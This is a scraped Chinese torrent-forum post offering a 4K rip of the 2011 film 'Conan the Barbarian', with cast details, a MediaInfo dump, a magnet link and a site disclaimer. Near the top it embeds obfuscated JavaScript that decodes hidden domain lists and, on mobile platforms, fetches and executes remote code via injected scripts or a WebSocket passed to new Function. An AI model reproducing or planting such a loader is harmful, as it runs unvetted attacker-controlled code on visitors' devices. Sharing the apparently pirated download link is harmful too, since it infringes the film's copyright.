王者之剑[英语音轨/中文字幕].Conan.the.Barbarian.2011.2160p.4K迅雷下载 21.31G

版主小s 1月前 215

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 王者之剑 / 蛮王柯南 / 新野蛮人柯南 / 勇者柯南

◎片 名 Conan the Barbarian

◎年 代 2011

◎产 地 美国

◎类 别 动作 / 奇幻 / 冒险

◎语 言 英语

◎上映日期 2012-02-26(中国大陆) / 2011-08-19(美国)

◎IMDb链接 https://www.imdb.com/title/tt0816462/

◎豆瓣评分 5.3/10 (10689人评价)

◎豆瓣链接 https://movie.douban.com/subject/2298964/

◎片 长 112分钟

◎导 演 马库斯·尼斯佩尔 Marcus Nispel (id:1000324)

◎编 剧 托马斯·迪恩·唐纳利 Thomas Dean Donnelly (id:1328309)

约书亚·奥本海默 Joshua Oppenheimer (id:1293605)

◎演 员 杰森·莫玛 Jason Momoa (id:1022614)

朗·普尔曼 Ron Perlman (id:1002688)

罗丝·麦高恩 Rose McGowan (id:1049504)

史蒂芬·朗 Stephen Lang (id:1010537)

瑞秋·尼科尔斯 Rachel Nichols (id:1013774)

萨伊德·塔格马奥 Sa?d Taghmaoui (id:1010660)

巴沙尔·拉海尔 Bashar Rahal (id:1140666)

摩根·弗里曼 Morgan Freeman (id:1054534)

内森·琼斯 Nathan Jones (id:1022750)

波布·萨普 Bob Sapp (id:1173250)

黛安娜·柳贝诺娃 Diana Lyubenova (id:1331612)

里奥·霍华德 Leo Howard (id:1009408)

布莱恩·安德鲁·门多萨 Brian Andrew Mendoza (id:1448368)

李菲 Fei Li (id:1400568)

大卫·雷奇 David Leitch (id:1289765)

◎标 签 动作 / 美国 / 魔幻 / 奇幻 / 美国电影 / 蛮王柯南 / 2011 / 漫画改编

◎简 介

本片根据1932年罗伯特·霍华德的漫画《剑上的凤凰》改编而成,是《蛮王柯南》三部曲的第一部。

在地球蛮荒时期,一切以武力来解决争斗。远古大陆上,两支兵强马壮的部落军队正在进行厮杀,而其中有一位勇敢的战士率领自己的部落获得了战争的胜利,他就是蛮王柯南(杰森·莫玛JasonMomoa饰)。得胜归来的柯南受到了部落的爱戴,他诛杀可怕的怪物,为部落开拓疆土,但一场阴谋正在谋划当中……

超自然的邪恶势力正意图侵蚀柯南的部落,它控制部落里的心腹,整个部落惨遭屠杀,连柯南的父亲科灵(朗·普尔曼RonPerlman饰)也未能幸免。意外活下来的柯南,将穿越西伯利亚冰原寻找盟友的帮助,他身负血海深仇,将用最原始、最野蛮的方式,为自己的父亲和同族报仇……

  1. General

  2. Unique ID : 310800946749127193893834376842201681000 (0xE9D215C32313F7B73802C4831DB24C68)

  3. Complete name : Conan.the.Barbarian.2011.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 21.3 GiB

  7. Duration : 1 h 52 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 27.1 Mb/s

  10. Movie name : Conan the Barbarian 2011 2160p HDR UHD BluRay TrueHD 7.1 Atmos x265-10bit-HDS

  11. Encoded date : UTC 2021-06-16 04:30:02

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 52 min

  22. Bit rate : 21.7 Mb/s

  23. Width : 3 840 pixels

  24. Height : 2 160 pixels

  25. Display aspect ratio : 16:9

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.109

  32. Stream size : 17.1 GiB (80%)

  33. Title : [email protected]

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio

  46. ID : 2

  47. Format : MLP FBA 16-ch

  48. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  49. Commercial name : Dolby TrueHD with Dolby Atmos

  50. Codec ID : A_TRUEHD

  51. Duration : 1 h 52 min

  52. Bit rate mode : Variable

  53. Bit rate : 5 323 kb/s

  54. Maximum bit rate : 7 986 kb/s

  55. Channel(s) : 8 channels

  56. Channel layout : L R C LFE Ls Rs Lb Rb

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 1 200.000 FPS (40 SPF)

  59. Compression mode : Lossless

  60. Stream size : 4.18 GiB (20%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No

  65. Number of dynamic objects : 11

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Text #1

  69. ID : 3

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 1 h 43 min

  75. Bit rate : 12.3 kb/s

  76. Count of elements : 1374

  77. Stream size : 9.07 MiB (0%)

  78. Title : CHS

  79. Language : Chinese

  80. Default : Yes

  81. Forced : No


  82. Text #2

  83. ID : 4

  84. Format : PGS

  85. Muxing mode : zlib

  86. Codec ID : S_HDMV/PGS

  87. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration : 1 h 43 min

  89. Bit rate : 12.8 kb/s

  90. Count of elements : 1374

  91. Stream size : 9.46 MiB (0%)

  92. Title : CHT

  93. Language : Chinese

  94. Default : No

  95. Forced : No


  96. Menu

  97. 00:00:00.000 : en:Chapter 01

  98. 00:04:31.396 : en:Chapter 02

  99. 00:10:37.846 : en:Chapter 03

  100. 00:17:41.852 : en:Chapter 04

  101. 00:26:15.991 : en:Chapter 05

  102. 00:29:10.290 : en:Chapter 06

  103. 00:37:56.649 : en:Chapter 07

  104. 00:47:50.367 : en:Chapter 08

  105. 00:51:48.689 : en:Chapter 09

  106. 01:00:16.530 : en:Chapter 10

  107. 01:08:09.294 : en:Chapter 11

  108. 01:13:58.893 : en:Chapter 12

  109. 01:17:45.160 : en:Chapter 13

  110. 01:22:28.277 : en:Chapter 14

  111. 01:33:32.273 : en:Chapter 15

  112. 01:41:00.179 : en:Chapter 16


TAGS 动作 奇幻 冒险

磁力链:
  • magnet:?xt=urn:btih:90C78D43C7EBCF48EBCC1C719EA6ED62E477708B
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回